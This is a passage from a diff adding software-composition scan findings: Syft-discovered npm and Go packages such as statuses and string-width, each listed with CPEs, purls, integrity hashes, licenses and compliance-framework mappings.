"cpe:2.3:a:source-map:source-map-js:1.2.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:source-map:source_map_js:1.2.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:source_map:source-map-js:1.2.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:source_map:source_map_js:1.2.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:source:source-map-js:1.2.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:source:source_map_js:1.2.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/source-map-js@1.2.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/source-map-js/-/source-map-js-1.2.1.tgz", + "integrity": "sha512-UXWMKhLOwVKb728IUtQPXxfYU+usdybtUrK/8uGE8CQMvrhOpwvzDBwj0QhSL7MQc7vIsISBG8VQ8+IDQxpfQA==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "8a8949f600357d51", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: standard-as-callback 2.1.0", + "title": "standard-as-callback 2.1.0", + "description": "Package discovered: standard-as-callback 2.1.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "ae42b44f62499323", + "name": "standard-as-callback", + "version": "2.1.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:standard-as-callback:standard-as-callback:2.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:standard-as-callback:standard_as_callback:2.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:standard_as_callback:standard-as-callback:2.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:standard_as_callback:standard_as_callback:2.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:standard-as:standard-as-callback:2.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:standard-as:standard_as_callback:2.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:standard_as:standard-as-callback:2.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:standard_as:standard_as_callback:2.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:standard:standard-as-callback:2.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:standard:standard_as_callback:2.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/standard-as-callback@2.1.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/standard-as-callback/-/standard-as-callback-2.1.0.tgz", + "integrity": "sha512-qoRRSyROncaz1z0mvYqIE4lCd9p2R90i6GxW3uZv5ucSu8tU7B5HXUP1gG8pVZsYNVaXjk8ClXHPttLyxAL48A==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "4830d30cd7a05603", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: statuses 2.0.2", + "title": "statuses 2.0.2", + "description": "Package discovered: statuses 2.0.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "7442cb30a409bd68", + "name": "statuses", + "version": "2.0.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:statuses:statuses:2.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/statuses@2.0.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/statuses/-/statuses-2.0.2.tgz", + "integrity": "sha512-DvEy55V3DB7uknRo+4iOGT5fP1slR8wQohVdknigZPMpMstaKJQWhwiYBACJE3Ul2pTnATihhBYnRhZQHGBiRw==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "fce9dfc2e720150a", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/node_modules/@esbuild/darwin-arm64/bin/esbuild", + "startLine": 0 + }, + "message": "Package discovered: stdlib go1.20.12", + "title": "stdlib go1.20.12", + "description": "Package discovered: stdlib go1.20.12", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "755a3e00c5f656c9", + "name": "stdlib", + "version": "go1.20.12", + "type": "go-module", + "foundBy": "go-module-binary-cataloger", + "locations": [ + { + "path": "/node_modules/@esbuild/darwin-arm64/bin/esbuild", + "accessPath": "/node_modules/@esbuild/darwin-arm64/bin/esbuild", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "BSD-3-Clause", + "spdxExpression": "BSD-3-Clause", + "type": "declared", + "urls": [], + "locations": [] + } + ], + "language": "go", + "cpes": [ + { + "cpe": "cpe:2.3:a:golang:go:1.20.12:-:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:golang/stdlib@1.20.12", + "metadataType": "go-module-buildinfo-entry", + "metadata": { + "goCompiledVersion": "go1.20.12", + "architecture": "" + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "684726e125b93b59", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/node_modules/esbuild/bin/esbuild", + "startLine": 0 + }, + "message": "Package discovered: stdlib go1.20.12", + "title": "stdlib go1.20.12", + "description": "Package discovered: stdlib go1.20.12", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "e9a4a6eb4de31a0f", + "name": "stdlib", + "version": "go1.20.12", + "type": "go-module", + "foundBy": "go-module-binary-cataloger", + "locations": [ + { + "path": "/node_modules/esbuild/bin/esbuild", + "accessPath": "/node_modules/esbuild/bin/esbuild", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "BSD-3-Clause", + "spdxExpression": "BSD-3-Clause", + "type": "declared", + "urls": [], + "locations": [] + } + ], + "language": "go", + "cpes": [ + { + "cpe": "cpe:2.3:a:golang:go:1.20.12:-:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:golang/stdlib@1.20.12", + "metadataType": "go-module-buildinfo-entry", + "metadata": { + "goCompiledVersion": "go1.20.12", + "architecture": "" + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "12c7b9072b4ac0c3", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: stream-events 1.0.5", + "title": "stream-events 1.0.5", + "description": "Package discovered: stream-events 1.0.5", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "d6075f31d1f26f1b", + "name": "stream-events", + "version": "1.0.5", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:stream-events:stream-events:1.0.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:stream-events:stream_events:1.0.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:stream_events:stream-events:1.0.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:stream_events:stream_events:1.0.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:stream:stream-events:1.0.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:stream:stream_events:1.0.5:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/stream-events@1.0.5", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/stream-events/-/stream-events-1.0.5.tgz", + "integrity": "sha512-E1GUzBSgvct8Jsb3v2X15pjzN1tYebtbLaMg+eBOUOAxgbLoSbT2NS91ckc5lJD1KfLjId+jXJRgo0qnV5Nerg==", + "dependencies": { + "stubs": "^3.0.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "42a667b9f8ef2c86", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: stream-shift 1.0.3", + "title": "stream-shift 1.0.3", + "description": "Package discovered: stream-shift 1.0.3", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "1acff9076c855611", + "name": "stream-shift", + "version": "1.0.3", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:stream-shift:stream-shift:1.0.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:stream-shift:stream_shift:1.0.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:stream_shift:stream-shift:1.0.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:stream_shift:stream_shift:1.0.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:stream:stream-shift:1.0.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:stream:stream_shift:1.0.3:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/stream-shift@1.0.3", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/stream-shift/-/stream-shift-1.0.3.tgz", + "integrity": "sha512-76ORR0DO1o1hlKwTbi/DM3EXWGf3ZJYO8cXX5RJwnul2DEg2oyoZyjLNoQM8WsvZiFKCRfC1O0J7iCvie3RZmQ==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "89e93178704235e4", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: streamsearch 1.1.0", + "title": "streamsearch 1.1.0", + "description": "Package discovered: streamsearch 1.1.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "c7163598759ab751", + "name": "streamsearch", + "version": "1.1.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:streamsearch:streamsearch:1.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/streamsearch@1.1.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/streamsearch/-/streamsearch-1.1.0.tgz", + "integrity": "sha512-Mcc5wHehp9aXz1ax6bZUyY5afg9u2rv5cqQI3mRrYkGC8rW2hM02jWuwjtL++LS5qinSyhj2QfLyNsuc+VsExg==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "d28f82c740f787aa", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: string-width 4.2.3", + "title": "string-width 4.2.3", + "description": "Package discovered: string-width 4.2.3", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "6c7ed5b8c0bd71e8", + "name": "string-width", + "version": "4.2.3", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:string-width:string-width:4.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:string-width:string_width:4.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:string_width:string-width:4.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:string_width:string_width:4.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:string:string-width:4.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:string:string_width:4.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/string-width@4.2.3", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", + "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", + "dependencies": { + "emoji-regex": "^8.0.0", + "is-fullwidth-code-point": "^3.0.0", + "strip-ansi": "^6.0.1" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": 